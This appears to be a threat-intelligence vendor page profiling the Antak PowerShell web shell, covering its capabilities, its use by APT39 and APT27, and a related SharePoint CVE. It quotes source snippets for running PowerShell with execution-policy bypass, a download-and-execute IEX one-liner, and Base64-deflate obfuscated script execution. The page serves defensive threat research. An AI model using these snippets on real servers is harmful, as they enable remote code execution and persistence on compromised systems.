Antak is an open-source, PowerShell-based ASP.NET web shell included in the Nishang offensive security framework. Implemented in C#, it provides an authenticated web interface for remote command execution and post-exploitation access to Windows web servers. Each command runs in a separate PowerShell process, with execution-policy bypass enabled and command output returned to the operator. Antak also supports execution of compressed, Base64-encoded PowerShell scripts, file uploads and downloads, and SQL Server queries. Its configuration-parsing functionality discovers database connection strings in ASP.NET application configurations, including support for handling encrypted connection-string sections, enabling credential harvesting and database access. These features support reconnaissance, data retrieval, and continued access to compromised servers. Antak has been deployed following exploitation of vulnerable web servers and has been used by APT39, an espionage group targeting telecommunications, travel, and government organizations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Initial access was believed to be via CVE-2019-0604, after which the actors planted multiple web shells — Antak v0.5.0 (error2.aspx) and China Chopper–style one-liners.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Initial access was believed to be via CVE-2019-0604, after which the actors planted multiple web shells — Antak v0.5.0 (error2.aspx) and China Chopper–style one-liners.
10 distinct techniques documented for this family, organized by ATT&CK tactic.
psi.FileName = "powershell.exe"; psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg; | Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
Paste the script in command textbox and click 'Encode and Execute'.
string code = Convert.ToBase64String(ms.ToArray()); string command = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('" + code + "')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();";
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Web shell deployed by APT27 after SharePoint exploitation to maintain foothold and support post-exploitation.
Web shell installed by APT39 on compromised systems. The content provides no further capability details.
Web shell used to maintain access on compromised servers.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.